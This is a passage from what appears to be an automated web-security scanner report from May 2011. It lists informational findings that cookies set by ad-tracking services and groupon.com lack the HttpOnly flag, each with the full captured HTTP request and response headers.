Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bklc=4dc7f363; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101DfI4ByU9WiUOgD=; bkst=KJh5Dn+v96WD7uvQZ1x/kAvyLcHC775Zy1/RRNx1/DjEvokk+QAAH5iLVwLayPIyWzPs6W/DhP5oTp5Rt9QV++bLEUY3ylkypo61rjAiInRZUtLjzG5TQLE5EgKU5JKEHbErAPGQ/4B1DmRe6VjH/1mte3pHB/C9Qa1HGhbQ7wG4dFpYzyUuO2GTaXM/3XOHOGcNpC+F39x3CCd7bcXqgNuaVbuIAJGkxk190TUDiiZCxYifkf+srj95u00kiPGtEDCZej49BjzvBmBQkkw8veLbzVqhY4WhT7kisTtezvKrT7VI65RgcEZGB77ExCpP3dlZSFZ7K/7KWdEmAUvo63pDVQNSijw+03qrhdFQuGBIrBqgo/w0rPcf3aDRG1h0gQtrRsqTKRj01D2/MiHNf8nuG5y5+9qC2yF0fd7HWQtQ7Jvv1Gf4uvZpDzM9mmkLsWaG7bXr6cLbdKdZU2oJqNL=; bk=uBEq2hA+ZqtVIHOf; bkc=KJh56paGANWxOdedub/huuDjavsSYO3E/WaGi9VqJqsEyIzih9ymDgJ6n2avCWQqiATsQGVYz2GsTC9HOhrSGmeQbY9/xStiQtYVk7u35NdpArdKXwchQf+f22b2ayTYqfTo4wJ2+Ou91wZNTULKMwlmelCbyWSMRf7QugeUnAkpFcSElsTeiDNt/XfmPvD8UM+0siCzDjC0IsX1yC0FlSmZUA6eNAcUzrBmiB60pwcS3yaQIa1CkwhQfT42t0+2Zpb7mPXfHwlKgxcjOIX+e2hr5+by+0G2z6SSbtkl0xWbplA0Nt47u2/zgXl8C5abf1GDWnZGzJwt5y/jtXUcWmjXfH5rTBWzLaErtF7LyxloUTjgL2nweUB2fuBSfNj5TD+p5Iyn2bPpNbu7T2/f1K7wDuwdvRH84KN7BvXOpqmIlba87fU2ppecS8d09UtSPfcjL4wjE6guazmzg8ti2facf0Vdw4alyh0FFDQKfikzeljGdLotf/46jzBUSj8mr8SkdxIkd0h/7pX7p4NGVlxKChbaqwYTwlR3YVcfFGfLGdKl7kjGqf65rhIP8FATp47SJXZ+kyoBCXrsbIZJ4UE452zCUa0HpkVAIKIL2pD3blBdE7BdtFXO6GR1X9==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 15:35:47 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=HEYMqHA+ZqtVIHOf; expires=Sat, 05-Nov-2011 15:35:47 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh566a/PaWDOredpApS3eZpu9Jn98NsYHWuYX3BN3gaz0B1nk3WeWEfD9reiHnHkzvxWnutZgeaHnuG6jWYaIN3WxCu35xi0WNC3pgd0ImXzhKwhy477cFrw4KrB9wU7pkXuvTceLYvKn9HhkzEBqKkQJK4c58cd1/pT2VFsTeWsFOy3HnWWmrZjp3LsSXriz+kGwLhF5Hae6hq1Nf54QxRwKUxawswn/yjgNbEoobl9LcFSCecuJoK2LhT2U68ifN+ClEwrl9d2n5bbtc8GZSImil2UkZx18NTs0xxM218pdUENZKmVgmKriorkwmXJsj2mM5rpUQNX64lNb1nEDefuRKnLg2es9i5FyBM83L4h/cqaTYqD2Dy72T2qflMKKsz2qh7Nk4dk4Drah6IkPRw4mvS2PYF5VrU2jrL2zK1kpXnRbbF7oB8fzGXifX31rIV6eX21N82m9kL0gp0oD3RE2X5+08TjgbbE2fckg0UlBmSFlCZFw3sKsdnTV03/FBlGqB4gEL278j8HCtfj56yS4N2pwgT1VFtGyfAwwTAc9jEddrMIloQcBfU4u4kdultm8u4FegyjLSSXTZSIKGbX4/MCNnWD8bndED78qbFnL/T4X2b3seB4fEKHLqVjl2HLpdNwtTMary=; expires=Sat, 05-Nov-2011 15:35:47 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 15:35:47 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

11.106. http://tags.bluekai.com/site/3869  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3869

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3869 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bklc=4dc7f363; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101DfI4ByU9WiUOgD=; bk=rWh9VOA+ZqtVIHOf; bkc=KJh56XXgHaWDOdeF7HAdhG2Za3xxhHiuavsyXVBkXVpDLnYxjZ1FFhGNxZJaEju02r1Pi2kR1O7hcNQGJE2MG5QxvX88UwwmUqhK72f877F4md4jKD90Y5E+oYyw+Z++zrKi2n9FTToYRvCsGzekkpYWrPffP9WcoReNAqSXs9i02yNpF4jYwFe8GOOLmn4GW5Cwm5n25n7BKK6QfU5yeKiSwnBXXcgjWz18i2JBH5nzEp+BpMXaKL7z7htjAmjbqzTwdSlcMCz9ajDvw4HIVKC6cJta1mKNNfl9E9zycALfK4jqrduMTqDtbPUeladfZ2qgu0Czti4dnCIHfZbDn3tPwQ8nUTu1devWKUl+ajgUsX6pXjbiKHzf4MU125384rYS8CVND6bKwEzCcE41KKlZ9cOdGhej0dMV1B5gc2cX4eEFpV6IF8Tb2kvPBB5gMNcIXNbCBjYiXbn9e+2JPhrrodZffjZVporu4CbPnirH8FNGVdE2F7yvURc42tWlB6eRm52d2+wdr+siABy2dw5NuJg7bEq7+qwJINLv+LLhyTZVMwl6dDTt/O05kIbmudw5lKX3JwFpd+pZdV7d91QM9hX=; bkst=KJh5Dn+v96WD7uvQZ1x/kAvyLcHC775Zy1/RRNx1/DjEvokk+QAAH5iLVwLayPIyWzPs6W/DhP5oTp5Rt9QV++bLEUY3ylkypo61rjAiInRZUtLjzG5TQLE5EgKU5JKEHbErAPGQ/4B1DmRe6VjH/1mte3pHB/C9Qa1HGhbQ7wG4dFpYzyUuO2GTaXM/3XOHOGcNpC+F39x3CCd7bcXqgNuaVbuIAJGkxk190TUDiiZCxYifkf+srj95u00kiPGtEDCZej49BjzvBmBQkkw8veLbzVqhY4WhT7kisTtezvKrT7VI65RgcEZGB77ExCpP3dlZSFZ7K/7KWdEmAUvo63pDVQNSijw+03qrhdFQuGBIrBqgo/w0rPcf3aDRG1h0gQtrRsqTKRj01D2/MiHNf8nuG5y5+9qC2yF0fd7HWQtQ7Jvv1Gf4uvZpDzM9mmkLsWaG7bXr6cLbdKdZU2oJqNL=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 15:35:40 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 10 May 2011 15:35:40 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=uBEq2hA+ZqtVIHOf; expires=Sat, 05-Nov-2011 15:35:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56paGANWxOdedub/huuDjavsSYO3E/WaGi9VqJqsEyIzih9ymDgJ6n2avCWQqiATsQGVYz2GsTC9HOhrSGmeQbY9/xStiQtYVk7u35NdpArdKXwchQf+f22b2ayTYqfTo4wJ2+Ou91wZNTULKMwlmelCbyWSMRf7QugeUnAkpFcSElsTeiDNt/XfmPvD8UM+0siCzDjC0IsX1yC0FlSmZUA6eNAcUzrBmiB60pwcS3yaQIa1CkwhQfT42t0+2Zpb7mPXfHwlKgxcjOIX+e2hr5+by+0G2z6SSbtkl0xWbplA0Nt47u2/zgXl8C5abf1GDWnZGzJwt5y/jtXUcWmjXfH5rTBWzLaErtF7LyxloUTjgL2nweUB2fuBSfNj5TD+p5Iyn2bPpNbu7T2/f1K7wDuwdvRH84KN7BvXOpqmIlba87fU2ppecS8d09UtSPfcjL4wjE6guazmzg8ti2facf0Vdw4alyh0FFDQKfikzeljGdLotf/46jzBUSj8mr8SkdxIkd0h/7pX7p4NGVlxKChbaqwYTwlR3YVcfFGfLGdKl7kjGqf65rhIP8FATp47SJXZ+kyoBCXrsbIZJ4UE452zCUa0HpkVAIKIL2pD3blBdE7BdtFXO6GR1X9==; expires=Sat, 05-Nov-2011 15:35:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 15:35:40 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

11.107. http://trc.taboolasyndication.com/usatoday/log/2/visible  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/log/2/visible

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usatoday/log/2/visible?ri=21db8aab092294661c05925509bb8015&sd=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415&ui=d80f7856-eeab-487a-988c-f15ce2ff8eb0&pi=46732364&pt=text&li=rbox-t2v&il=4158710290402832976%2C1510865350917446228&id=3432&url=http%3A//cdn.taboolasyndication.com/pixel.gif HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_session_id=v1_923a143436baa4e0bd9cd36ac2e2bd5f_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1304954989_1304955415; taboola_wv=; taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0; JSESSIONID=.prod2-f2

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 15:36:58 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Cache-Control: no-cache
Pragma: no-cache
Location: http://cdn.taboolasyndication.com/pixel.gif
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 0
Set-Cookie: taboola_rii=4158710290402832976_1510865350917446228;Path=/usatoday/;Expires=Tue, 08-May-12 15:36:58 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8


11.108. http://trgc.opt.fimserve.com/fp.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trgc.opt.fimserve.com
Path:   /fp.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fp.gif?pixelid=738-002553&rnd=555853643077 HTTP/1.1
Host: trgc.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; ssrtb=0; UI="2a8dbca1b98673a117|79973.9.-5.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; LO=00Oj63Jim1.00GK000h0W3NTAEE0; TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:19 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
Server: PR/1.4.0.0/0.7.61
P3P: policyref="http://www.fimserve.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Set-Cookie: TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=; domain=.fimserve.com; path=/; expires= Wednesday, 22-Apr-2020 12:22:20 GMT

GIF89a.............!.......,...........L..;

11.109. http://trgca.opt.fimserve.com/fp.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trgca.opt.fimserve.com
Path:   /fp.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fp.gif?pixelid=287-036699&diresu=154dab7990adc1d6f3372c12 HTTP/1.1
Host: trgca.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; ssrtb=0; UI="2a8dbca1b98673a117|79973.9.-5.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; LO=00Oj63Jim1.00GK000h0W3NTAEE0; TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 43
Server: PR/1.4.0.0/0.7.61
P3P: policyref="http://www.fimserve.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close
Set-Cookie: TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=; domain=.fimserve.com; path=/; expires= Wednesday, 22-Apr-2020 12:22:20 GMT

GIF89a.............!.......,...........L..;

11.110. http://va.px.invitemedia.com/adnxs_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /adnxs_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adnxs_imp?returnType=image&key=AdImp&cost=3.260000&creativeID=113105&message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf&managed=false HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304954972+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuG48plFgEni6YQF71gUGDUWTgTSBowWYD6XDMeFD0xA2cdgWSaNO5uXAmWZLO5AZb9/YxZglPj/bD5Y7//jC8F6wXyg7OwbINnnUNn2+RCTwXwuEY6VZ1mBsp3f24CyDBoMBgwWDEDRewdYgfZtufDrLbLoK7Abny36gSK6Yj7IhMl9p1FEd94H2Tpr/lqEKAB9a00/"; io_freq_p1="eJzjkuY4HijAIvF0woJ3LAqMGgsnAmkDRgswn0ucY7e1AJPEY7AkgwaDAZPFHajEAhegxP9n8+ESz0FsLmGOqxECjBKd39ugEgwWDEDB9a5A1Vsu/HqLLLgtFKhyct9pFMG9LkDBWfPXIgQB0Zcv8g=="; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; segments_p1="eJzjYuZYEMzFzHE0h4uF48QTJi4ujj37mAW+r9j+jgUocrCbEUhOesoEVNIYAZT8s41JYPfzZ0BJZo5zOUDiNEjjcaBGFo4duxiBAv/Cgcy970HM6cZA5pwfILl3B5iBZGcHiHy9BSQy9wfI0IkqQOaL3cxAo3cC7b176wjQaCYODqDUxmKg1JMLIAecBJvxdjdI94XvIPahIyByJli8+T/IpH8cQGbTf5DAvU5moMB+PyDz4l6QwMt9IHLtfkYAPXVDgw=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:37:12 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 15:36:52 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1304955432+ \"5056308203649640923\"+ 4451+ 6017+ 2]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuFYeZZVgElixZQF71gUGDVetCx8x2LAaAHmc0lwXPnMApR9OgEky6DBAJQBs7lkOC58YALKPAbLMGnc2bwUqI/J4g5U9vs3ZgFGif/P5oNN/X8cYiqYD5SdfQMk+xwq2z5/AVgWzOcS4bh3AOSiLRd+vYXYyWDBABR9BXbJs0U/UERXzGcFmjS57zSK6M77IPNnzV+LEAUAeCtQJA=="; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEue4GiHAJLFiyoJ3LAoMGgwGjBZgNpc4x/FAARaJpxMQEmA2UGK3NVDHY7gEk8UdqMQCF6DE/2fz4RLPQWwuYY71rkCJLRd+vYVIMFgwAAW3hQowSkzuO40iuNcFKDhr/lqEIAArXi/T"; Domain=invitemedia.com; expires=Tue, 08-May-2012 15:37:12 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

11.111. http://www.groupon.com/dallas/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /dallas/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dallas/ HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:13 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:13 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: visited=visit_1; path=/; expires=Sun, 09-May-2021 15:38:13 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:13 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/subscriptions/new?division_p=dallas
X-Runtime: 34
Cache-Control: no-cache
Content-Length: 124
Connection: keep-alive

<html><body>You are being <a href="http://www.groupon.com/subscriptions/new?division_p=dallas">redirected</a>.</body></html>

11.112. http://www.groupon.com/learn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /learn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /learn HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
